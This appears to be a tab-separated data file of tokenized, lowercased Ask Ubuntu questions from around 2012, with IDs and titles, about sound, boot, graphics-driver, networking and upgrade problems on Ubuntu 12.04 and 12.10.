203254	no soundcards found . alsa disappeared ?	my sound has disappeared on my ubuntu lucid machine . it was there yesterday . i think we took a power cycle overnight and so my pc had rebooted this morning . after compiling pjsua ( the pjsip commandline sip client ) and installing it , i tried to run it . no sound . $ lsmod | grep snd no output . $ alsamixer no such file or directory , just because you need to know , i tried innstalling oss on this machine . did n't get it working and tthought i 'd remove it . but some parts are still there . i have googled for hours and have tried a dozen fixes . none have worked . $ sudo lshw ... ... . *-multimedia unclaimed description : audio device product : 631xesb/632xesb high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 09 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fcffc000-fcffffff ... ... . $ lspci ... ... . 00:1b.0 audio device : intel corporation 631xesb/632xesb high definition audio controller ( rev 09 ) ... ... . $ sudo apt-get remove alsa-utils $ sudo apt-get install alsa-utils $ sudo apt-get remove alsa-base $ sudo apt-get install alsa-base $ sudo apt-get remove pulseaudio $ sudo add-apt-repository ppa : ubuntu-audio-dev/ppa $ sudo apt-get update $ sudo apt-get install linux-alsa-driver-modules- $ ( uname -r ) $ sudo echo options snd-hda-intel model=generic > > /etc/modprobe.d/alsa-base.conf $ sudo echo snd-hda-intel > > /etc/modules and probably others i 've forgotten . root also does not see the soundcards . of course this is ubuntu so i ca n't just login from scratch as root . i read a suggestion that i might have accidentally blacklisted the snd modules , but i 'm not sure which blacklist that 'd be in and how to un-blacklist them . any help ? anyone ?
203256	set a script to run automatically after apt-get dist-upgrade , install , remove and purge ?	how would i automatically run a script after the apt-get actions dist-upgrade , install , remove and purge ? is there a suitable way of hooking into the apt lifecycle and run a custom script ?
203258	cpu spikes to 100 % when trying to watch video	i just installed ubuntu 12.04 and now cpu spikes to 100 % when trying to watch a video . i do n't want to hear that this is a problem with flash or whatever ... playing video on my machine with ubuntu 11 was just fine . in fact i have another machine still with ubuntu 11 and it continues to play video just fine . now i 'm stuck with this 12.04 version and want to know how to downgrade back to version 11 as that version is n't buggy . ( hence a downgrade ) .
203260	unable to boot post upgrade to 12.10 from 12.04 on a dual boot pc	i have a dual boot pc with windows 7 and ubuntu . last night i upgraded from 12.04 to 12.10 and since then i have not been able to boot because the pc goes into grub rescue with the error `` file not found '' . i have tried the following steps : set prefix= ( hd0 , msdos5 ) /boot/grub/i386-pc/ set root= ( hd0 , msdos5 ) insmod normal i get error symbol not found : 'grub_disk_dev_list ' . when i try : linux /boot/vmlinuz-3.2.0-32-generic root=/dev/sda5 ro i get error - command not found 'linux ' ; same for initrd i am not able to find out what sdxx to set also .
203261	editing dns-nameservers in /etc/network/interfaces without a restart	after editing dns-nameservers in /etc/network/interfaces , how do i tell resolvconf ( 8 ) to read the new value without restarting networking ? ( causing a service interruption ) the -u option does n't seem to work , it just updates back to the same values .
203264	issue installing flexnet on ubuntu for program : geneious	afternoon , i can successful in my geneious pro software but when i am required to have flexnet installed for the licensing process . the prompt i am given is : to install flexnet on linux , run the following command from your shell as root : /home/shep/geneious/licensing_service/install_fnp.sh `` /home/shep/geneious/licensing_service/linux64/fnplicensingservice '' when you have done this , you can activate your license in geneious . as root : root @ jon : /home/shep/geneious/licensing_service # sh install_fnp.sh unable to locate anchor service to install , please specify correctly on command line also root @ jon : /home/shep/geneious/licensing_service/linux64 # sh fnplicensingservice fnplicensingservice : 2 : fnplicensingservice : syntax error : unterminated quoted string anyone have further ideas ? i tried to find the software online directly , that was no good either . ~jon
203267	where is utouch in ubuntu 12.10 ?	i have recently upgraded to ubuntu 12.10 and utouch seems to be removed from my system and i am not able to reinstall it through apt-get . where can i find it ?
203268	ubuntu live usb - finding files that were stored on my flash drive	how can i find the files that were stored on my flash drive before i installed ubuntu to it ? edit : no , i did n't format it , my files are still on the flash drive root . i just need to know how to access them there .
203269	xubuntu/lubuntu/ubuntu 12.10 can not load xfc/lxde/unity on netbook running intel n2600	i just tried doing a fresh install of the 3 flavors of ubuntu 12.10 and every time i try to boot into the gui interface , i face an error saying `` fatal error : no screens detected '' and then just thrown into the terminal prompt screen . did ubuntu discontinue support for the intel n2600 ( gma 3600 ) cpu/gpu ? i 'm trying to install linux on a asus eee pc 1025c netbook .
203270	display settings changes automatically with dual monitors in 12.04 and 12.10 amd	dual monitors works fine , except that the settings suddenly change . this happens very often , sometimes several times in a few minutes . it is very irritating having to set the settings again each time . suddenly mirroring is set to on , sometimes the monitor switch places ( from left to right and so on ) , and most of the times the screen resolutions are also changed . i use gnome shell . i have tried unity with the same result . i use an open driver . i have earlier used fglrx , with some better results ( still happens , but not so often ) , but ca n't install it sucsessfully after upgrading to ubuntu 12.10 . i know there is a similar question about this issue , but it 's not answered . i hope someone can help me .
203272	no a2dp streaming audio from 12.04 to bluetooth headset	i want to listen to streaming audio from ubuntu using headset ( bose bluetooth headset series 2 ) . although bluetooth connection is established , i have n't been able to hear anything via the headset . how can i work this around in general ( i know this might sound brutal but i do n't have much knowledge in audio setting on linux ) ? when i use my other bluetooth headset blueant q2 ( http : //www.myblueant.com/products/headsets/q2/index.php ) streaming is going . in `` hardware '' tab on sound setting panel ( not sure how it 's officially called but see the image below ) shows my headset . however , bose one never appears on the same window while it 's connected via bluetooth , except for a few seconds after i manually disconnect the headset ( this moment is snapshotted as the image below . when it 's connected the bose bt2 thing is never shown . btw , with android phone this headset works just fine ) . bose ' manual indicates that make sure the device supports a2dp audio streaming . so i tried to figure out if a2dp is enabled on my ubuntu ( referring to can i use my computer as an a2dp receiver ? ) , finding that it 's probably available as the result below shows : $ sdptool search -- bdaddr local a2snk searching for a2snk on ff : ff : ff:00:00:00 ... service name : audio sink service rechandle : 0x10005 service class id list : `` audio sink '' ( 0x110b ) protocol descriptor list : `` l2cap '' ( 0x0100 ) psm : 25 `` avdtp '' ( 0x0019 ) uint16 : 0x102 profile descriptor list : `` advanced audio '' ( 0x110d ) version : 0x0102
203279	what happen in the partition when i uninstall ubuntu ?	if i installed ubuntu from inside windows , and now i want to uninstall it , what happen with the partition in my disk ? will it be deleted ?
203288	why does my ubuntu one backup does not accept the password ?	after upgrading to 12.10 , backup is no longer working for me . it just does not accept password , thus no backups for me ! i have tried resetting the password online , and can login there fine , just not from backup application in ubuntu . ideas ?
203289	pxe booting ubuntu 12.10	now that the alternate cd has been axed , how can i obtain the pxe boot files formerly found in netboot ?
203294	ubuntu 12.04.1 and 12.10 usb mouse and touchpad lag	i have tried ubuntu 12.04.1 and ubuntu 12.10 , and i get a very nasty lag while using my usb mouse and/or touchpad . i have tried fedora and it 's a little better on the lag , but i still get it . i know it 's not a hardware problem , because it works fine on windows . i have googled this problem and can not find a fix for this issue . please , any help would be much appreciated .
203295	how do i stop syncing a folder outside ~/ubuntu one ?	yes i know this question is in the faq but is no answear for them - i read it and do n't find anything . my problem is that i have a folder ~/linux and i had synced that . then my folders in `` ubuntu one control panel '' is with 2 folders - ubuntu one - linux i dont want anymore sync linux . how i exclude it from my folders in `` ubuntu one control panel '' thank you .
203301	how to safely upgrade from an older ubuntu version to a newer one ?	how can i safely upgrade an ubuntu installation from one release to another ? what should i do before upgrading to ensure it goes smoothly , and is there any clean-up i need to do afterwards ? in particular , do i need to do anything special if i am using packages from ppas , if i have a graphics card that needs drivers , or if i 'm running a custom linux kernel ? this is a general question , but as example we take ubuntu 12.04 and ubuntu 12.10
203303	power savings and performance modes on ubuntu system	this might be the only thing i miss from windows . there is no way to tell the system to run in high performance mode or in power saver mode . may be this feature which is already there and i am not sure . so , is there a way to change the system operation mode into high-performance ? basically , over burning the rams and processors enabling to do several power effective task like running two oses on vmware and not having any performance degradation . or , changing the system 's mode into power-saver mode affecting the battery life my a lot ? p.s : i dont think what can of hardware i have has to depend while answering this . but if is , i will include my system details as well .
203307	getting an error while using wubi installing	i 'm getting the error below while using wubi to install ubuntu 12.10 on windows 7 premium . i tried running wubi as an admin and got the same error . i ca n't find an answer anywhere to this anywhere . please help me ! error executing command > > command=c : \windows\sysnative\bcdedit.exe/set { 95947f39-17a0-11e1-87c9-f358cae1eaf9 } device partition=d : > > retval=1 > > stderr=an error has occurred setting the element data . the request is not supported .
203308	ubuntu 12.04 stuck on booting screen ( the one with orange dots )	i somewhat recently starting running ubuntu 12.04 on my macbook pro 5-5 with minimal problems . the main issue i was having was i could n't control the screen brightness , which after searching , i realized was a common problem . i tried to fix it by opening sudo gedit /etc/x11/xorg.conf and adding '' registrydwords '' `` enablebrightnesscontrol=1 '' when i rebooted , the screen got stuck at the ubuntu screen with the 5 orange dots . i tried searching for solutions , but nothing has worked . i 'm guessing i messed up the xorg.conf because after booting to the terminal and entering startx it shows a fatal error of no screens detected . i tried using sudo dpkg-reconfigure xserver-xorg but that did n't work , so then i tried using sudo apt-get remove xserver-xorg then reinstalling it with sudo apt-get install xserver-xorg and rebooted , but it still gets stuck at the same screen . i 'm new to ubuntu and linux in general , so i 'm not sure what i messed up or how to fix it . i know i can always reinstall ubuntu , but i 'm trying to fix it without having to do that . thanks ! edit : i have a nvidia geforce 9400m graphics card and am using additional drivers that i install when i installed ubuntu .
203309	xsltproc killed , out of memory	i 'm trying to split up a 13gb xml file into small ~50mb xml files with this xslt style sheet . but this process kills xsltproc after i see it taking up over 1.7gb of memory ( that 's the total on the system ) . is there any way to deal with huge xml files with xsltproc ? can i change my style sheet ? or should i use a different processor ? or am i just s.o.l. ? < xsl : stylesheet xmlns : xsl= '' http : //www.w3.org/1999/xsl/transform '' version= '' 1.0 '' xmlns : exsl= '' http : //exslt.org/common '' extension-element-prefixes= '' exsl '' xmlns : fn= '' http : //www.w3.org/2005/xpath-functions '' > < xsl : output method= '' xml '' indent= '' yes '' / > < xsl : strip-space elements= '' * '' / > < xsl : param name= '' block-size '' select= '' 75000 '' / > < xsl : template match= '' / '' > < xsl : copy > < xsl : apply-templates select= '' mysqldump/database/table_data/row [ position ( ) mod $ block-size = 1 ] '' / > < /xsl : copy > < /xsl : template > < xsl : template match= '' row '' > < exsl : document href= '' chunk- { position ( ) } .xml '' > < add > < xsl : for-each select= '' . | following-sibling : :row [ position ( ) & lt ; $ block-size ] '' > < doc > < xsl : for-each select= '' field '' > < field > < xsl : attribute name= '' name '' > < xsl : value-of select= '' ./ @ name '' / > < /xsl : attribute > < xsl : value-of select= '' . `` / > < /field > < xsl : text > & # xa ; < /xsl : text > < /xsl : for-each > < /doc > < /xsl : for-each > < /add > < /exsl : document > < /xsl : template >
203311	how do i disable the minimization effect ?	in ubuntu 12.10 there has been a minimize effect added to the system . the minimize effect was not present in previous version of ubuntu . the effect makes things seem slow . how can i disable it ?
203312	how come my sound wo n't work on lenovo thinkpad x230 ?	i have a lenovo thinkpad x230 that i just purchased and installed ubuntu 12.10 on it . there is no sound , how do i fix it ? i checked that my volume is not muted . i also tried checking in alsamixer and it looks like it does n't see my sound card .
203317	can i do a command-line install with the 12.10 media ?	from what i read on the mailing list , and on here , it looks like there wo n't be any alternative install cds for quantal quetzal . i used to love those , as they enabled me to quickly whip out a command-line only install . with a base install , i could load xorg , my desired window manager ( usually openbox or razor-qt ) , and keep my ubuntu installation tiny and cruft free . is that no more ?
203322	how do you keep unity panel while using cairo-dock on 12.10 ?	on ubuntu 12.04 i was able to keep unity panel ( the thing at the top of the screen with the time , log out options , wireless connectivity , battery power details , etc ) while not keeping the unity shell ( side panel thing with the launchers ) and having cairo-dock as my launcher of programs . in ubuntu 12.10 i do n't seem to be able to do this . i 'm able to use cairo-dock without unity shell and panel no problem but i ca n't seem to get the unity panel from staying while the unity shell ( side-panel with launchers and dash ) is absent . basically i want you to tell me how i can re-accomplish that which is in the picture below on ubuntu 12.10 . ( this pic from was 12.04 )
203323	should i use a 32 or 64-bit system ?	my computer is a lenovo ( 2010 model ) with 1 gb of ram , 32 gb of harddrive ( dedicated to ubuntu ) , a intel core 2 duo processor . i would like to know which is the right system for my computer ( 32 or 64 bits ) for optimum performance .
203326	minecraft fullscreen not working	i upgraded to quantal recently , and minecraft seems to not want to run in fullscreen . when i go to fullscreen it , the screen will go black for a second , as if it was about to go fullscreen normally , but then it just restores back into its window . so far i have tried : using different jres ( i 've tried openjdk 6 and 7 , as well as oracle7 ) . oracle 's jre would n't even run minecraft ( i just got a black screen after logging in ) switching graphics drivers ( tried nvidia-current , nvidia-current-updates , and xserver-xorg-video-nouveau ) updating minecraft bin files updating lwjgl libraries separately from the lwjgl site none of this seemed to work at all . i am running minecraft with the command java -xmx1024m -xms512m -cp minecraft.jar net.minecraft.launcherframe graphics card is geforce 9500 gs/pcie/sse2 . everything was working fine a few days ago when i was on 12.04 .
203329	how to reload variety wallpaper changer ?	i have installed variety desktop wallpaper changer . its a good app . but sometimes when i start ubuntu and login to my account it fails to load . i try to manually start the app by clicking on variety icon , but doesnt work . i tried alt+f2 and enter 'killall gnome-panel ' but nothing seems to happen . i checked in my startup applications window , variety is present there to start when ubuntu starts . but then why it does not start always ? restarting my pc is the only solution then . is there a way that i can reload variety without logging off or restarting ubuntu ? thanks in advance .
203330	how to install mysql 5.6 ?	i just installed ubuntu 12.10 ( amd64 ) , and want to install a recent version of mysql 5.6 . if possible , i would like to install ( not upgrade ) it the `` debian way ' ( i.e. , using apt-get or dpkg ) .
203331	external hard disk not workng on windows after i formatted it on ubuntu	i formatted my western digital 500 gb hard disk on ubuntu 10.4 and now i want to use it on windows 7 but it can not detect it . i formatted it with fat ( applicable to all ) option . i tried to google this problem a bit and as suggested by one of the site i tried to format this drive with ntfs . still windows can not detect it . drives in windows 7 is not a problem because i tried a different usb drive on it and it works . i can see the led of the drive glow when i connect it and i can also see remove drive safely option in lower right corner , but i can not see any option in `` my computer '' to access the hard disk . i am new to ubuntu . any help is appreciated .
203332	can i create another user in my window 7 computer to install the ubuntu ?	my computer is window 7 but i would like to try the ubuntu so can i create another user to install the ubuntu or just do like the tutorial in wubi ?
203333	12.10 unable to install or even run from live cd with nvidia gtx 580	i 've used ubuntu in the past ( set up as web server , etc over in iraq ) , so i 'm not a 100 % linux noob , however , i 'm running into a brick wall here . i 've got a machine i built when i got back to the us earlier this year , running windows 7 ultimate on it , and i 've now got some free time and would like to transition over to ubuntu full time . i 've searched around in the forums , and there seems to be an issue with the nvidia graphics cards , so i 've tried going to the evga site to see if i could find a new bios update for it and had no luck , so i 'm back searching the forums here again and decided to just go ahead and post my question . my apologies if this is covered in another post and i was just unable to find it . i 've found a few 'similar ' posts , but nothing as bad as my issue . with the history aside , here is the actual detailed issue : i purchased a new ssd ( intel 520 ssd ) , arrived today , and i disconnect my old windows 7 ssd . i had pre downloaded the ubuntu-12.10-desktop-amd64 earlier today and burned it to dvd . upon inserting the live cd into the computer and booting up , everything was fine up to the 'run from live cd ' or 'install ubuntu now ' buttons . as i was sure i wanted to go ahead and make the switch , i selected the 'install now ' from the right hand side . cd spins up , black window pops up , and then the errors started : date/time gpu lockup date/time failed to idle channel 1 date/time pfifo - playlist update failed date/time failed to idle channel 2 date/time pfifo - playlist update failed thinking it might correct itself , i let it run and it would swap over to a gui screen that was locked up with major blurring/etc , then back to the command line with the errors . eventually it said something along the lines of 'unknown status ' and switched back to the gui and froze . so , that 's when i tried to see if i could find a bios upgrade for the nvidia gtx580 cards , and had no luck . so i thought , why not try to just run it from the live cd and see if i can at least get a look at it , maybe if i could get it running try to do some sort of install from there and fix the driver issue . i rebooted , brought up the live cd , and this time chose the left option / run from the cd . it brought me all the way in to the desktop , i saw my drives , the other icons , could move the mouse , etc for about 30 seconds and then it locked up completely . i 've tried this a couple of times and get the same results every time . hardware : intel i7-3930k cpu @ 3.2ghz ( 12 cpus ) / msi ms-7760 motherboard / 32gb ram / 2 x evga ( nvidia ) geforce gtx 580 ( 4gb ram each ) so the question is : is there any way to install 12.10 if you ca n't even get the live cd to run ( for more than 30 seconds ) ? my current hardware configuration is both of the gtx 580 cards have an sli jumper on them , and i have 2 monitors on each card . ( ubuntu info obviously only shows on the main monitor from the failed installation and the attempt at running the live cd ) . perhaps opening the machine back up and removing the sli jumper and removing the other 3 monitors ( so it only would have 1 video card with one monitor on it ) would actually allow me to get 12.10 installed , then i could work on an nvidia video driver fix for the gtx 580 , and then possibly hook up the other video card and monitors ? or is this something that they are currently aware of and may update with a future release in the next few days/weeks ? any thoughts or suggestions would be greatly appreciated , as i ca n't even try to fix the issue ( assuming it is the nvidia drivers ) if i ca n't even get it to install at all .
203337	enabling unattended-upgrades from a shell script	i have a shell script to automatically configure new ubuntu virtual machines for my purposes . i would like this script to install and enable unattended-upgrades , but i can not figure out how to do so without user interaction . the usual way to enable upgrades is dpkg-reconfigure unattended-upgrades , but of course that is interactive . the noninteractive front end avoids asking any questions at all , and the text front end seems bound and determined to do its i/o with the tty and not with stdin/stdout .
203338	ca n't install ubuntu on my windows 7 laptop	i tried installing ubuntu in two different ways : first , i tried the windows installer , and it goes well until i reboot the system and , when booting on ubuntu , i get the error : no root file system defined . second , i uninstalled wubi by going to to control panel - > uninstall programs - > ubuntu . then , i booted the laptop from the live cd and selected install . it boots okay but in the screen right after the one that says to make sure you have 4.5 gb available , internet connection , etc , when i click continue it throws me a message saying that ubuntu had an internal error and asks me if i want to report the error . after that , i just have a black screen and nothing else ! no ubuntu installed , no boot option to go back to windows . nothing ! my goal is to install ubuntu alongside windows 7 ( without the hassle of formatting the computer , creating partition , etc ) . how can i do it ( preferable using windows installer ) ? how can i solve the `` no root file system defined '' that i encountered when i used the windows installer ?
203341	grub bootloader goes fail to boot in dual boot system after installing ubuntu 12.10	i had 12.04 with my dual boot system . yesterday i downloaded ubuntu 12.10 make bootable usb and choose upgrade option in installer . after installation grub failed to boot my machine . i tried following to fix grub bootloder . same problem i fixed with ubuntu 12.04 using live usb but this solution not work for ubuntu 12.10 . now coming at exactly where this solution goes fail . i followed this steps after booting live usb and opening terminal . 1 ) sudo fdisk -l to see where linux is installed 2 ) sudo mount /dev/sda9 /mnt where sda9 is my linux partition 3 ) sudo mount /dev/sda9 /mnt/boot 4 ) sudo mount -- bind /dev /mnt/dev 5 ) sudo chroot /mnt ( no problems with this steps done perfectly ) 6 ) grub-install /dev/sda when i type command i got error that source_dir does n't exist please specify -- target or -- directory how can i solve this ?
203342	i can not boot into ubuntu 12.10 after upgrade from 12.04 .	i 'm using ubuntu alongside windows 7 . the upgrade went fine but after reboot i 'm getting grub prompt that says grub > how can i get ubuntu back without losing windows 7 ?
203346	error when booting 12.10 after upgrade	since upgrading to 12.10 from 12.04 , i get the following error every time it boots : /scripts/init-premount/devpts : line 21 mountpoint not found it does , however , skip over that and continue to boot . i ca n't find that location , however . any ideas ?
203348	how do i limit thumbnails size and life time ?	how to limit thumbnails life time ( maximum_age ) and size ( maximum_size ) in ubuntu 12.04 with dconf ? or should i install gconf-editor to do this ?
203350	why is ftp file transfer from android phone slow ?	to transfer files from my android phone to ubuntu , i use an app that creates a ftp server on the phone . copying files to ubuntu 12.04 ( same with 12.10 ) i get up to 260 kb/s . copying files to windows 7 i get up to 1050 kb/s . i am currently on a fresh install of 12.10 with barely anything installed with the same results . i have tested with both a galaxy s3 and htc desire hd with identical results . i have tested about 5 apps with the same results . why is it slow on ubuntu ?
203351	broken indicators in 12.10	several of the indicators do n't work for me in ubuntu 12.10 . specifically , indicator-sensors and the skype indicator ( i also used the ubuntuone indicator , but that has n't come out yet for 12.10 ) . indicators that do work include : sound , network , time , system , battery , empathy , indicator-multiload , and dropbox . thanks !
203362	how can i install avant window navigator in 12.10 ?	installing the ubuntu 11.10 packages works.i ca n't compile awn on ubuntu 12.10 . and i ca n't install it with the software-center but the program is listed on it . it is n't like awn depends to 100 % on vala , so all non vala written parts of awn schould be runnable on ubuntu 12.10 too .
203370	i just upgraded to 12.10 lost my side bar	i just upgraded to 12.10 from 12.04 and now i do n't have the side bar to access the dash tab.i have also lost the bar at the top that shows the volume and internet connection .
203371	no internet after upgrading to 12.10	i upgraded to quantic yesterday ; it runs on a macbook pro . after using boot-repair to be able to boot to ubuntu ( via live cd ) , i found myself without any connection to internet , be it with ethernet or wireless . when i try a ping ubuntu.com from the default ubuntu terminal , the only answer i get is ping : unknown host ubuntu.com . here is a list of facts : the computer is a macbook pro ( `` macbookpro3,1 '' with sudo dmidecode -s system-product-name ) ; internet is provided through a router ( with tomato on it ) ; local network works fine : i can ping other devices , mount nas volumes via fstab , etc . other devices can connect to internet ; this is how i can write this question . i searched on askubuntu.com and other websites , but everything i tried end up with no luck . any help would be much appreciated ! : ) here is what a lspci -nnk gives me : subsystem : apple inc. device [ 106b:00a0 ] 00:01.0 pci bridge [ 0604 ] : intel corporation mobile pm965/gm965/gl960 pci express root port [ 8086:2a01 ] ( rev 03 ) kernel driver in use : pcieport kernel modules : shpchp 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 [ 8086:2834 ] ( rev 03 ) kernel driver in use : uhci_hcd 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 [ 8086:2835 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : uhci_hcd 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 [ 8086:283a ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : ehci_hcd 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 03 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 3 [ 8086:2843 ] ( rev 03 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 5 [ 8086:2847 ] ( rev 03 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 6 [ 8086:2849 ] ( rev 03 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : ehci_hcd 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev f3 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hm ( ich8m ) lpc interface controller [ 8086:2815 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel modules : lpc_ich 00:1f.1 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller [ 8086:2850 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : ata_piix 00:1f.2 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] [ 8086:2828 ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : ata_piix 00:1f.3 smbus [ 0c05 ] : intel corporation 82801h ( ich8 family ) smbus controller [ 8086:283e ] ( rev 03 ) subsystem : apple inc. device [ 106b:00a0 ] kernel modules : i2c-i801 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation g84 [ geforce 8600m gt ] [ 10de:0407 ] ( rev a1 ) subsystem : apple inc. device [ 106b:00a0 ] kernel driver in use : nvidia kernel modules : nvidia_current , nouveau , nvidiafb 0b:00.0 network controller [ 0280 ] : atheros communications inc. ar5418 wireless network adapter [ ar5008e 802.11 ( a ) bgn ] ( pci-express ) [ 168c:0024 ] ( rev 01 ) subsystem : apple inc. ar5bxb72 802.11abgn mini pcie card [ ar5008e-3nx ] [ 106b:0087 ] kernel driver in use : ath9k kernel modules : ath9k 0c:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8058 pci-e gigabit ethernet controller [ 11ab:436a ] ( rev 13 ) subsystem : marvell technology group ltd. imac 8,1 wired ethernet adapter [ 11ab:00ba ] kernel driver in use : sky2 kernel modules : sky2 0d:03.0 firewire ( ieee 1394 ) [ 0c00 ] : texas instruments tsb82aa2 ieee-1394b link layer controller [ 104c:8025 ] ( rev 02 ) kernel driver in use : firewire_ohci kernel modules : firewire-ohci
203374	ubuntu 12.10 low graphics mode	i just installed ubuntu 12.10 in my hp pavilion d6 having nvidia geforce gt 630m . now i 'm not able to boot into ubuntu . i get a error saying that the system is running in low-graphics mode . in the next step when it asks me chose what to do i chose `` run in low-graphics mode for just one session and the screen goes blank . this is happening in ubuntu 12.10 not 12.04 .
203377	ca n't login in to ubuntu vm	whenever i try to login into my ubuntu vm from my username , it goes briefly to a black screen and then back to the login screen . i can login as `` guest '' though . i can login with just the terminal with ctrl-alt-f1 . i have checked disk usage there and it is not the issue . oddly , in this terminal , some of my keys are goofy . for instance , hitting the `` / '' results in a `` - '' being typed while typing `` : '' , `` ' '' , `` { `` , etc results in accented vowels . i do n't understand this at all -- perhaps some settings somewhere really got goofed up . i was able to login just last night and use my vm . recently today , my computer performed some windows updates ( i have windows 7 ) and there is a chance that they may have been the cause . i have tried creating a new vm through the vdi we were given ( for a class ) and the same exact problem occurs again ! please help ! thanks .
203378	ubuntu does not boot	i tried to upgrade ubuntu to 12.04.1 , but in the middle of the upgrade , something got borked , and now ubuntu wo n't boot . when i try to run recovery mode , it says `` loading inital ramdisk '' i 'm dual-booting with win7 , so i made an ubuntu live-usb , but when i boot from it , i ca n't find my other ( original ) ubuntu partition . what 's going on , and how can i go about fixing this ?
203384	ubuntu 9.04 not creating lan connection	i installed ubuntu 9.04 on my hp probook . it 's processor is intel core i3 and ram is 8gb . i am not able to create a lan connection . how can i connect it from my lan connection . thanks
203387	how do i turn on the login startup sound theme ?	i remember old releases of ubuntu , when started you got these african drums initiating your session . now , ( 12.04 or 12.10 ) i do not hear them any more . so , here is my naive question : is there a way to turn them on ?
203388	12.04 gnome shell broken after updates	i 'm running ubuntu 12.04 , and using gnome shell . i 've had my machine running for the last few days , and i 've been installing updates as the update manager bugs me . i just rebooted , and now gnome wo n't start . i can use gnome classic and unity , but gnome 3 is n't working at all . when i log in , the screen is black for maybe 20 seconds , but the cursor shows . then , my wallpaper , but nothing else shows up . i can get a terminal with ctrl+alt+t , and i tried to run gnome-shell , but it segfaulted .
203389	how to reinstall windows 7 home premium oa without burning drives or usb ?	i am a noob with ubuntu and linux and i just think it is better with windows . my pc is a compaq presario cq57 and it was pre-loaded with windows 7 home premium oa . i used all my hard drive space for ubuntu , and i would like to get windows back . the laptop never came with any recovery partitions or cd disks or anything , just computer , charger , and some manuals . someone accedently threw away the box when i removed windows so i really never would know if there was a hidden cd or anything in there . i have the product keys and everything just nothing to reinstall windows . so could someone help me ? ? ? ? ? ?
203395	which ubuntu os will support lenovo thinkpad e430	i am trying to install ubuntu 10.10 64 bit os in lenovo think pad edge e430 laptop ( 4gb ram , 500gb hard disk with 1gb nvidia graphics ) but its not installing . its giving error of some graphic issues . kindly help me which ubuntu will suitable for this model . awaiting for your quick response . thank you , basavaraj
203400	nvidia optimus and ubuntu 12.10	i 'm new to linux environment . i have nvidia geforce gt 520m which is optimus card . i installed ubuntu 12.10 and on the top of that i installed nvidia 's new driver 304.60 but something went wrong and display manager is totally screwed nothing is displaying properly . all fonts are big and i 'm able to access only nautilus as everything went out of the screen . i tried removing it and rollback it to nouveau but it is happening in any case . i want better power management and i want to use my card for cuda programming so i was installing driver before installing bumblebee . can anyone please tell me simple steps to use my card for cuda programming ? with cuda 5 .
203408	theme color issues after upgrading to 12.10	i installed the mac os snow leopard theme when i used ubuntu 12.04 . all went well and the result was really awsome . however since i upgraded to ubuntu 12.10 i have an issue with the selected item color : it does n't show the way it should ( just the blue item color and the item highlighted ) , the selected item also shows a ligh gray regtangular form and the text is white with a blue ligning . it is difficult to explain and it is a shame i can not upload a pic , but one thing is sure it is ugly . tx for the help
203416	how to upgrade/update online accounts software in ubuntu 11.10 to that available in ubuntu 12.10 ?	the online accounts software present is latest release is very cool , is it possible to update that software in ubuntu 11.10 without having to upgrade to 12.10 .
203417	i want to delete colors added in terminal	i added color on the gnome-terminal as in the picture and now i want to delete the custom colors added i want to have the colors as in this picture
